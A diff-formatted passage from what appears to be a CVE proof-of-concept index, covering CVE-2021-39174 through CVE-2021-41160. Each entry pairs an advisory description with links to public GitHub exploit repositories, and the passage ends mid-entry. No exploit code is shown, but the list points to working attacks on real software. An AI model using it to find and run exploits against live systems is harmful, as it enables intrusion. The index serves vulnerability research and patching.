+Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can leak the value of any configuration entry of the dotenv file, e.g. the application secret (`APP_KEY`) and various passwords (email, database, etc). This issue was addressed in version 2.5.1 by improving `UpdateConfigCommandHandler` and preventing the use of nested variables in the resulting dotenv configuration file. As a workaround, only allow trusted source IP addresses to access to the administration dashboard.
+
+
+- [n0kovo/CVE-2021-39174-PoC](https://github.com/n0kovo/CVE-2021-39174-PoC)
+- [hadrian3689/cachet_2.4.0-dev](https://github.com/hadrian3689/cachet_2.4.0-dev)
+
+### CVE-2021-39273 (2021-08-19)
+
+In XeroSecurity Sn1per 9.0 (free version), insecure permissions (0777) are set upon application execution, allowing an unprivileged user to modify the application, modules, and configuration files. This leads to arbitrary code execution with root privileges.
+
+
+- [nikip72/CVE-2021-39273-CVE-2021-39274](https://github.com/nikip72/CVE-2021-39273-CVE-2021-39274)
+
+### CVE-2021-39287
+- [Fearless523/CVE-2021-39287-Stored-XSS](https://github.com/Fearless523/CVE-2021-39287-Stored-XSS)
+
+### CVE-2021-39377 (2021-09-01)
+
+A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the index.php username parameter.
+
+
+- [security-n/CVE-2021-39377](https://github.com/security-n/CVE-2021-39377)
+
+### CVE-2021-39378 (2021-09-01)
+
+A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the NamesList.php str parameter.
+
+
+- [security-n/CVE-2021-39378](https://github.com/security-n/CVE-2021-39378)
+
+### CVE-2021-39379 (2021-09-01)
+
+A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the ResetUserInfo.php password_stn_id parameter.
+
+
+- [security-n/CVE-2021-39379](https://github.com/security-n/CVE-2021-39379)
+
+### CVE-2021-39408 (2022-06-24)
+
+Cross Site Scripting (XSS) vulnerability exists in Online Student Rate System 1.0 via the page parameter on the index.php file
+
+
+- [StefanDorresteijn/CVE-2021-39408](https://github.com/StefanDorresteijn/CVE-2021-39408)
+
+### CVE-2021-39409 (2022-06-24)
+
+A vulnerability exists in Online Student Rate System v1.0 that allows any user to register as an administrator without needing to be authenticated.
+
+
+- [StefanDorresteijn/CVE-2021-39409](https://github.com/StefanDorresteijn/CVE-2021-39409)
+
+### CVE-2021-39433 (2021-10-04)
+
+A local file inclusion (LFI) vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.
+
+
+- [PinkDraconian/CVE-2021-39433](https://github.com/PinkDraconian/CVE-2021-39433)
+
+### CVE-2021-39473 (2022-11-04)
+
+Saibamen HotelManager v1.2 is vulnerable to Cross Site Scripting (XSS) due to improper sanitization of comment and contact fields.
+
+
+- [BrunoTeixeira1996/CVE-2021-39473](https://github.com/BrunoTeixeira1996/CVE-2021-39473)
+
+### CVE-2021-39475
+- [W4RCL0UD/CVE-2021-39475](https://github.com/W4RCL0UD/CVE-2021-39475)
+
+### CVE-2021-39476
+- [W4RCL0UD/CVE-2021-39476](https://github.com/W4RCL0UD/CVE-2021-39476)
+
+### CVE-2021-39512
+- [guusec/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver](https://github.com/guusec/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver)
+
+### CVE-2021-39623 (2022-01-14)
+
+In doRead of SimpleDecodingSource.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-194105348
+
+
+- [bb33bb/CVE-2021-39623](https://github.com/bb33bb/CVE-2021-39623)
+
+### CVE-2021-39670 (2022-05-10)
+
+In setStream of WallpaperManager.java, there is a possible way to cause a permanent DoS due to improper input validation. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12LAndroid ID: A-204087139
+
+
+- [Supersonic/Wallbreak](https://github.com/Supersonic/Wallbreak)
+
+### CVE-2021-39685 (2022-03-16)
+
+In various setup methods of the USB gadget subsystem, there is a possible out of bounds write due to an incorrect flag check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210292376References: Upstream kernel
+
+
+- [szymonh/inspector-gadget](https://github.com/szymonh/inspector-gadget)
+
+### CVE-2021-39692 (2022-03-16)
+
+In onCreate of SetupLayoutActivity.java, there is a possible way to setup a work profile bypassing user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209611539
+
+
+- [nanopathi/packages_apps_ManagedProvisioning_CVE-2021-39692](https://github.com/nanopathi/packages_apps_ManagedProvisioning_CVE-2021-39692)
+
+### CVE-2021-39696 (2022-08-09)
+
+In Task.java, there is a possible escalation of privilege due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-185810717
+
+
+- [nidhihcl/frameworks_base_AOSP_10_r33_CVE-2021-39696](https://github.com/nidhihcl/frameworks_base_AOSP_10_r33_CVE-2021-39696)
+
+### CVE-2021-39704 (2022-03-16)
+
+In deleteNotificationChannelGroup of NotificationManagerService.java, there is a possible way to run foreground service without user notification due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209965481
+
+
+- [nanopathi/framework_base_AOSP10_r33_CVE-2021-39704](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-39704)
+
+### CVE-2021-39706 (2022-03-16)
+
+In onResume of CredentialStorage.java, there is a possible way to cleanup content of credentials storage due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-200164168
+
+
+- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-39706](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-39706)
+
+### CVE-2021-39749 (2022-03-30)
+
+In WindowManager, there is a possible way to start non-exported and protected activities due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-205996115
+
+
+- [michalbednarski/OrganizerTransaction](https://github.com/michalbednarski/OrganizerTransaction)
+
+### CVE-2021-39863 (2021-09-14)
+
+Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a Buffer Overflow vulnerability when parsing a specially crafted PDF file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
+
+
+- [lsw29475/CVE-2021-39863](https://github.com/lsw29475/CVE-2021-39863)
+
+### CVE-2021-40101 (2021-11-30)
+
+An issue was discovered in Concrete CMS before 8.5.7. The Dashboard allows a user's password to be changed without a prompt for the current password.
+
+
+- [S1lkys/CVE-2021-40101](https://github.com/S1lkys/CVE-2021-40101)
+
+### CVE-2021-40113 (2021-11-03)
+
+Multiple vulnerabilities in the web-based management interface of the Cisco Catalyst Passive Optical Network (PON) Series Switches Optical Network Terminal (ONT) could allow an unauthenticated, remote attacker to perform the following actions: Log in with a default credential if the Telnet protocol is enabled Perform command injection Modify the configuration For more information about these vulnerabilities, see the Details section of this advisory.
+
+
+- [karamMahmad/CVE-2021-40113](https://github.com/karamMahmad/CVE-2021-40113)
+
+### CVE-2021-40154 (2021-12-01)
+
+NXP LPC55S69 devices before A3 have a buffer over-read via a crafted wlength value in a GET Descriptor Configuration request during use of USB In-System Programming (ISP) mode. This discloses protected flash memory.
+
+
+- [Jeromeyoung/CVE-2021-40154](https://github.com/Jeromeyoung/CVE-2021-40154)
+
+### CVE-2021-40222 (2021-09-09)
+
+Rittal CMC PU III Web management Version affected: V3.11.00_2. Version fixed: V3.17.10 is affected by a remote code execution vulnerablity. It is possible to introduce shell code to create a reverse shell in the PU-Hostname field of the TCP/IP Configuration dialog. Web application fails to sanitize user input on Network TCP/IP configuration page. This allows the attacker to inject commands as root on the device which will be executed once the data is received.
+
+
+- [asang17/CVE-2021-40222](https://github.com/asang17/CVE-2021-40222)
+
+### CVE-2021-40223 (2021-09-09)
+
+Rittal CMC PU III Web management (version V3.11.00_2) fails to sanitize user input on several parameters of the configuration (User Configuration dialog, Task Configuration dialog and set logging filter dialog). This allows an attacker to backdoor the device with HTML and browser-interpreted content (such as JavaScript or other client-side scripts). The XSS payload will be triggered when the user accesses some specific sections of the application.
+
+
+- [asang17/CVE-2021-40223](https://github.com/asang17/CVE-2021-40223)
+
+### CVE-2021-40303 (2022-11-08)
+
+perfex crm 1.10 is vulnerable to Cross Site Scripting (XSS) via /clients/profile.
+
+
+- [zecopro/CVE-2021-40303](https://github.com/zecopro/CVE-2021-40303)
+
+### CVE-2021-40345 (2021-10-26)
+
+An issue was discovered in Nagios XI 5.8.5. In the Manage Dashlets section of the Admin panel, an administrator can upload ZIP files. A command injection (within the name of the first file in the archive) allows an attacker to execute system commands.
+
+
+- [ArianeBlow/NagiosXI-RCE-all-version-CVE-2021-40345](https://github.com/ArianeBlow/NagiosXI-RCE-all-version-CVE-2021-40345)
+
+### CVE-2021-40346 (2021-09-08)
+
+An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.
+
+
+- [knqyf263/CVE-2021-40346](https://github.com/knqyf263/CVE-2021-40346)
+- [donky16/CVE-2021-40346-POC](https://github.com/donky16/CVE-2021-40346-POC)
+- [alikarimi999/CVE-2021-40346](https://github.com/alikarimi999/CVE-2021-40346)
+- [Vulnmachines/HAProxy_CVE-2021-40346](https://github.com/Vulnmachines/HAProxy_CVE-2021-40346)
+- [alexOarga/CVE-2021-40346](https://github.com/alexOarga/CVE-2021-40346)
+
+### CVE-2021-40352 (2021-09-01)
+
+OpenEMR 6.0.0 has a pnotes_print.php?noteid= Insecure Direct Object Reference vulnerability via which an attacker can read the messages of all users.
+
+
+- [allenenosh/CVE-2021-40352](https://github.com/allenenosh/CVE-2021-40352)
+
+### CVE-2021-40353 (2021-09-01)
+
+A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the index.php USERNAME parameter. NOTE: this issue may exist because of an incomplete fix for CVE-2020-6637.
+
+
+- [5qu1n7/CVE-2021-40353](https://github.com/5qu1n7/CVE-2021-40353)
+
+### CVE-2021-40373 (2021-09-10)
+
+playSMS before 1.4.5 allows Arbitrary Code Execution by entering PHP code at the #tabs-information-page of core_main_config, and then executing that code via the index.php?app=main&inc=core_welcome URI.
+
+
+- [maikroservice/CVE-2021-40373](https://github.com/maikroservice/CVE-2021-40373)
+
+### CVE-2021-40374 (2022-04-06)
+
+A stored cross-site scripting (XSS) vulnerability was identified in Apperta Foundation OpenEyes 3.5.1. Updating a patient's details allows remote attackers to inject arbitrary web script or HTML via the Address1 parameter. This JavaScript then executes when the patient profile is loaded, which could be used in a XSS attack.
+
+
+- [DCKento/CVE-2021-40374](https://github.com/DCKento/CVE-2021-40374)
+
+### CVE-2021-40375 (2022-04-06)
+
+Apperta Foundation OpenEyes 3.5.1 allows remote attackers to view the sensitive information of patients without having the intended level of privilege. Despite OpenEyes returning a Forbidden error message, the contents of a patient's profile are still returned in the server response. This response can be read in an intercepting proxy or by viewing the page source. Sensitive information returned in responses includes patient PII and medication records or history.
+
+
+- [DCKento/CVE-2021-40375](https://github.com/DCKento/CVE-2021-40375)
+
+### CVE-2021-40438 (2021-09-16)
+
+A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier.
+
+
+- [xiaojiangxl/CVE-2021-40438](https://github.com/xiaojiangxl/CVE-2021-40438)
+- [sixpacksecurity/CVE-2021-40438](https://github.com/sixpacksecurity/CVE-2021-40438)
+- [BabyTeam1024/CVE-2021-40438](https://github.com/BabyTeam1024/CVE-2021-40438)
+- [ericmann/apache-cve-poc](https://github.com/ericmann/apache-cve-poc)
+- [pisut4152/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt)
+- [Kashkovsky/CVE-2021-40438](https://github.com/Kashkovsky/CVE-2021-40438)
+- [gassara-kys/CVE-2021-40438](https://github.com/gassara-kys/CVE-2021-40438)
+- [sergiovks/CVE-2021-40438-Apache-2.4.48-SSRF-exploit](https://github.com/sergiovks/CVE-2021-40438-Apache-2.4.48-SSRF-exploit)
+- [Cappricio-Securities/CVE-2021-40438](https://github.com/Cappricio-Securities/CVE-2021-40438)
+
+### CVE-2021-40444 (2021-09-15)
+
+<p>Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.</p>\n<p>An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.</p>\n<p>Microsoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: “Suspicious Cpl File Execution”.</p>\n<p>Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.</p>\n<p>Please see the <strong>Mitigations</strong> and <strong>Workaround</strong> sections for important information about steps you can take to protect your system from this vulnerability.</p>\n<p><strong>UPDATE</strong> September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. Please see the FAQ for important information about which updates are applicable to your system.</p>\n
+
+
+- [ozergoker/CVE-2021-40444](https://github.com/ozergoker/CVE-2021-40444)
+- [DarkSprings/CVE-2021-40444](https://github.com/DarkSprings/CVE-2021-40444)
+- [rfcxv/CVE-2021-40444-POC](https://github.com/rfcxv/CVE-2021-40444-POC)
+- [bambooqj/CVE-2021-40444_EXP_JS](https://github.com/bambooqj/CVE-2021-40444_EXP_JS)
+- [Immersive-Labs-Sec/cve-2021-40444-analysis](https://github.com/Immersive-Labs-Sec/cve-2021-40444-analysis)
+- [vysecurity/CVE-2021-40444](https://github.com/vysecurity/CVE-2021-40444)
+- [Udyz/CVE-2021-40444-Sample](https://github.com/Udyz/CVE-2021-40444-Sample)
+- [lockedbyte/CVE-2021-40444](https://github.com/lockedbyte/CVE-2021-40444)
+- [fengjixuchui/CVE-2021-40444-docx-Generate](https://github.com/fengjixuchui/CVE-2021-40444-docx-Generate)
+- [KnoooW/CVE-2021-40444-docx-Generate](https://github.com/KnoooW/CVE-2021-40444-docx-Generate)
+- [mansk1es/Caboom](https://github.com/mansk1es/Caboom)
+- [jamesrep/cve-2021-40444](https://github.com/jamesrep/cve-2021-40444)
+- [W1kyri3/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx](https://github.com/W1kyri3/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx)
+- [aslitsecurity/CVE-2021-40444_builders](https://github.com/aslitsecurity/CVE-2021-40444_builders)
+- [khoaduynu/CVE-2021-40444](https://github.com/khoaduynu/CVE-2021-40444)
+- [Jeromeyoung/MSHTMHell](https://github.com/Jeromeyoung/MSHTMHell)
+- [klezVirus/CVE-2021-40444](https://github.com/klezVirus/CVE-2021-40444)
+- [Udyz/CVE-2021-40444-CAB](https://github.com/Udyz/CVE-2021-40444-CAB)
+- [Edubr2020/CVE-2021-40444--CABless](https://github.com/Edubr2020/CVE-2021-40444--CABless)
+- [kal1gh0st/CVE-2021-40444_CAB_archives](https://github.com/kal1gh0st/CVE-2021-40444_CAB_archives)
+- [LazarusReborn/Docx-Exploit-2021](https://github.com/LazarusReborn/Docx-Exploit-2021)
+- [H0j3n/CVE-2021-40444](https://github.com/H0j3n/CVE-2021-40444)
+- [metehangenel/MSHTML-CVE-2021-40444](https://github.com/metehangenel/MSHTML-CVE-2021-40444)
+- [Jeromeyoung/TIC4301_Project](https://github.com/Jeromeyoung/TIC4301_Project)
+- [tiagob0b/CVE-2021-40444](https://github.com/tiagob0b/CVE-2021-40444)
+- [kagura-maru/CVE-2021-40444-POC](https://github.com/kagura-maru/CVE-2021-40444-POC)
+- [Zeop-CyberSec/word_mshtml](https://github.com/Zeop-CyberSec/word_mshtml)
+- [Alexcot25051999/CVE-2021-40444](https://github.com/Alexcot25051999/CVE-2021-40444)
+- [lisinan988/CVE-2021-40444-exp](https://github.com/lisinan988/CVE-2021-40444-exp)
+- [34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit](https://github.com/34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit)
+- [MRacumen/CVE-2021-40444](https://github.com/MRacumen/CVE-2021-40444)
+- [RedLeavesChilde/CVE-2021-40444](https://github.com/RedLeavesChilde/CVE-2021-40444)
+- [nvchungkma/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-](https://github.com/nvchungkma/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-)
+- [hqdat809/CVE-2021-40444](https://github.com/hqdat809/CVE-2021-40444)
+- [skitkat/CVE-2021-40444-POC](https://github.com/skitkat/CVE-2021-40444-POC)
+
+### CVE-2021-40449 (2021-10-13)
+
+Win32k Elevation of Privilege Vulnerability
+
+
+- [ly4k/CallbackHell](https://github.com/ly4k/CallbackHell)
+- [KaLendsi/CVE-2021-40449-Exploit](https://github.com/KaLendsi/CVE-2021-40449-Exploit)
+- [hakivvi/CVE-2021-40449](https://github.com/hakivvi/CVE-2021-40449)
+- [Kristal-g/CVE-2021-40449_poc](https://github.com/Kristal-g/CVE-2021-40449_poc)
+- [CppXL/cve-2021-40449-poc](https://github.com/CppXL/cve-2021-40449-poc)
+- [BL0odz/CVE-2021-40449-NtGdiResetDC-UAF](https://github.com/BL0odz/CVE-2021-40449-NtGdiResetDC-UAF)
+- [SamuelTulach/voidmap](https://github.com/SamuelTulach/voidmap)
+- [toanthang1842002/CVE-2021-40449](https://github.com/toanthang1842002/CVE-2021-40449)
+
+### CVE-2021-40492 (2021-09-03)
+
+A reflected XSS vulnerability exists in multiple pages in version 22 of the Gibbon application that allows for arbitrary execution of JavaScript (gibbonCourseClassID, gibbonPersonID, subpage, currentDate, or allStudents to index.php).
+
+
+- [5qu1n7/CVE-2021-40492](https://github.com/5qu1n7/CVE-2021-40492)
+
+### CVE-2021-40512
+- [war4uthor/CVE-2021-40512](https://github.com/war4uthor/CVE-2021-40512)
+
+### CVE-2021-40513
+- [war4uthor/CVE-2021-40513](https://github.com/war4uthor/CVE-2021-40513)
+
+### CVE-2021-40514
+- [war4uthor/CVE-2021-40514](https://github.com/war4uthor/CVE-2021-40514)
+
+### CVE-2021-40531 (2021-09-06)
+
+Sketch before 75 allows library feeds to be used to bypass file quarantine. Files are automatically downloaded and opened, without the com.apple.quarantine extended attribute. This results in remote code execution, as demonstrated by CommandString in a terminal profile to Terminal.app.
+
+
+- [jonpalmisc/CVE-2021-40531](https://github.com/jonpalmisc/CVE-2021-40531)
+
+### CVE-2021-40539 (2021-09-07)
+
+Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.
+
+
+- [DarkSprings/CVE-2021-40539](https://github.com/DarkSprings/CVE-2021-40539)
+- [synacktiv/CVE-2021-40539](https://github.com/synacktiv/CVE-2021-40539)
+
+### CVE-2021-40822 (2022-05-01)
+
+GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows SSRF via the option for setting a proxy host.
+
+
+- [phor3nsic/CVE-2021-40822](https://github.com/phor3nsic/CVE-2021-40822)
+
+### CVE-2021-40839 (2021-09-10)
+
+The rencode package through 1.0.6 for Python allows an infinite loop in typecode decoding (such as via ;\x2f\x7f), enabling a remote attack that consumes CPU and memory.
+
+
+- [itlabbet/CVE-2021-40839](https://github.com/itlabbet/CVE-2021-40839)
+
+### CVE-2021-40845 (2021-09-15)
+
+The web part of Zenitel AlphaCom XE Audio Server through 11.2.3.10, called AlphaWeb XE, does not restrict file upload in the Custom Scripts section at php/index.php. Neither the content nor extension of the uploaded files is checked, allowing execution of PHP code under the /cmd directory.
+
+
+- [ricardojoserf/CVE-2021-40845](https://github.com/ricardojoserf/CVE-2021-40845)
+
+### CVE-2021-40859 (2021-12-07)
+
+Backdoors were discovered in Auerswald COMpact 5500R 7.8A and 8.0B devices, that allow attackers with access to the web based management application full administrative access to the device.
+
+
+- [dorkerdevil/CVE-2021-40859](https://github.com/dorkerdevil/CVE-2021-40859)
+- [419066074/CVE-2021-40859](https://github.com/419066074/CVE-2021-40859)
+- [pussycat0x/CVE-2021-40859](https://github.com/pussycat0x/CVE-2021-40859)
+
+### CVE-2021-40865 (2021-10-25)
+
+An Unsafe Deserialization vulnerability exists in the worker services of the Apache Storm supervisor server allowing pre-auth Remote Code Execution (RCE). Apache Storm 2.2.x users should upgrade to version 2.2.1 or 2.3.0. Apache Storm 2.1.x users should upgrade to version 2.1.1. Apache Storm 1.x users should upgrade to version 1.2.4
+
+
+- [hktalent/CVE-2021-40865](https://github.com/hktalent/CVE-2021-40865)
+
+### CVE-2021-40870 (2021-09-13)
+
+An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
+
+
+- [System00-Security/CVE-2021-40870](https://github.com/System00-Security/CVE-2021-40870)
+- [0xAgun/CVE-2021-40870](https://github.com/0xAgun/CVE-2021-40870)
+- [orangmuda/CVE-2021-40870](https://github.com/orangmuda/CVE-2021-40870)
+- [JoyGhoshs/CVE-2021-40870](https://github.com/JoyGhoshs/CVE-2021-40870)
+
+### CVE-2021-40875 (2021-09-22)
+
+Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
+
+
+- [SakuraSamuraii/derailed](https://github.com/SakuraSamuraii/derailed)
+- [Lul/TestRail-files.md5-IAC-scanner](https://github.com/Lul/TestRail-files.md5-IAC-scanner)
+
+### CVE-2021-40903 (2022-06-17)
+
+A vulnerability in Antminer Monitor 0.50.0 exists because of backdoor or misconfiguration inside a settings file in flask server. Settings file has a predefined secret string, which would be randomly generated, however it is static.
+
+
+- [vulnz/CVE-2021-40903](https://github.com/vulnz/CVE-2021-40903)
+
+### CVE-2021-40904 (2022-03-25)
+
+The web management console of CheckMK Raw Edition (versions 1.5.0 to 1.6.0) allows a misconfiguration of the web-app Dokuwiki (installed by default), which allows embedded php code. As a result, remote code execution is achieved. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session by a user with the role of administrator.
+
+
+- [Edgarloyola/CVE-2021-40904](https://github.com/Edgarloyola/CVE-2021-40904)
+
+### CVE-2021-40905 (2022-03-25)
+
+The web management console of CheckMK Enterprise Edition (versions 1.5.0 to 2.0.0p9) does not properly sanitise the uploading of ".mkp" files, which are Extension Packages, making remote code execution possible. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session of a user with administrator role. NOTE: the vendor states that this is the intended behavior: admins are supposed to be able to execute code in this manner
+
+
+- [Edgarloyola/CVE-2021-40905](https://github.com/Edgarloyola/CVE-2021-40905)
+
+### CVE-2021-40906 (2022-03-25)
+
+CheckMK Raw Edition software (versions 1.5.0 to 1.6.0) does not sanitise the input of a web service parameter that is in an unauthenticated zone. This Reflected XSS allows an attacker to open a backdoor on the device with HTML content and interpreted by the browser (such as JavaScript or other client-side scripts) or to steal the session cookies of a user who has previously authenticated via a man in the middle. Successful exploitation requires access to the web service resource without authentication.
+
+
+- [Edgarloyola/CVE-2021-40906](https://github.com/Edgarloyola/CVE-2021-40906)
+
+### CVE-2021-40978 (2021-10-07)
+
+The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1
+
+
+- [nisdn/CVE-2021-40978](https://github.com/nisdn/CVE-2021-40978)
+
+### CVE-2021-41073 (2021-09-19)
+
+loop_rw_iter in fs/io_uring.c in the Linux kernel 5.10 through 5.14.6 allows local users to gain privileges by using IORING_OP_PROVIDE_BUFFERS to trigger a free of a kernel buffer, as demonstrated by using /proc/<pid>/maps for exploitation.
+
+
+- [chompie1337/Linux_LPE_io_uring_CVE-2021-41073](https://github.com/chompie1337/Linux_LPE_io_uring_CVE-2021-41073)
+
+### CVE-2021-41074
+- [dillonkirsch/CVE-2021-41074](https://github.com/dillonkirsch/CVE-2021-41074)
+
+### CVE-2021-41078 (2021-10-26)
+
+Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.
+
+
+- [s-index/CVE-2021-41078](https://github.com/s-index/CVE-2021-41078)
+
+### CVE-2021-41081 (2021-11-11)
+
+Zoho ManageEngine Network Configuration Manager before 125465 is vulnerable to SQL Injection in a configuration search.
+
+
+- [sudaiv/CVE-2021-41081](https://github.com/sudaiv/CVE-2021-41081)
+
+### CVE-2021-41091 (2021-10-04)
+
+Moby is an open-source project created by Docker to enable software containerization. A bug was found in Moby (Docker Engine) where the data directory (typically `/var/lib/docker`) contained subdirectories with insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as `setuid`), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files. This bug has been fixed in Moby (Docker Engine) 20.10.9. Users should update to this version as soon as possible. Running containers should be stopped and restarted for the permissions to be fixed. For users unable to upgrade limit access to the host to trusted users. Limit access to host volumes to trusted containers.
+
+
+- [UncleJ4ck/CVE-2021-41091](https://github.com/UncleJ4ck/CVE-2021-41091)
+- [jrbH4CK/CVE-2021-41091](https://github.com/jrbH4CK/CVE-2021-41091)
+
+### CVE-2021-41117 (2021-10-11)
+
+keypair is a a RSA PEM key generator written in javascript. keypair implements a lot of cryptographic primitives on its own or by borrowing from other libraries where possible, including node-forge. An issue was discovered where this library was generating identical RSA keys used in SSH. This would mean that the library is generating identical P, Q (and thus N) values which, in practical terms, is impossible with RSA-2048 keys. Generating identical values, repeatedly, usually indicates an issue with poor random number generation, or, poor handling of CSPRNG output. Issue 1: Poor random number generation (`GHSL-2021-1012`). The library does not rely entirely on a platform provided CSPRNG, rather, it uses it's own counter-based CMAC approach. Where things go wrong is seeding the CMAC implementation with "true" random data in the function `defaultSeedFile`. In order to seed the AES-CMAC generator, the library will take two different approaches depending on the JavaScript execution environment. In a browser, the library will use [`window.crypto.getRandomValues()`](https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L971). However, in a nodeJS execution environment, the `window` object is not defined, so it goes down a much less secure solution, also of which has a bug in it. It does look like the library tries to use node's CSPRNG when possible unfortunately, it looks like the `crypto` object is null because a variable was declared with the same name, and set to `null`. So the node CSPRNG path is never taken. However, when `window.crypto.getRandomValues()` is not available, a Lehmer LCG random number generator is used to seed the CMAC counter, and the LCG is seeded with `Math.random`. While this is poor and would likely qualify in a security bug in itself, it does not explain the extreme frequency in which duplicate keys occur. The main flaw: The output from the Lehmer LCG is encoded incorrectly. The specific [line][https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L1008] with the flaw is: `b.putByte(String.fromCharCode(next & 0xFF))` The [definition](https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L350-L352) of `putByte` is `util.ByteBuffer.prototype.putByte = function(b) {this.data += String.fromCharCode(b);};`. Simplified, this is `String.fromCharCode(String.fromCharCode(next & 0xFF))`. The double `String.fromCharCode` is almost certainly unintentional and the source of weak seeding. Unfortunately, this does not result in an error. Rather, it results most of the buffer containing zeros. Since we are masking with 0xFF, we can determine that 97% of the output from the LCG are converted to zeros. The only outputs that result in meaningful values are outputs 48 through 57, inclusive. The impact is that each byte in the RNG seed has a 97% chance of being 0 due to incorrect conversion. When it is not, the bytes are 0 through 9. In summary, there are three immediate concerns: 1. The library has an insecure random number fallback path. Ideally the library would require a strong CSPRNG instead of attempting to use a LCG and `Math.random`. 2. The library does not correctly use a strong random number generator when run in NodeJS, even though a strong CSPRNG is available. 3. The fallback path has an issue in the implementation where a majority of the seed data is going to effectively be zero. Due to the poor random number generation, keypair generates RSA keys that are relatively easy to guess. This could enable an attacker to decrypt confidential messages or gain authorized access to an account belonging to the victim.
+
+
+- [badkeys/keypairvuln](https://github.com/badkeys/keypairvuln)
+
+### CVE-2021-41160 (2021-10-21)
+
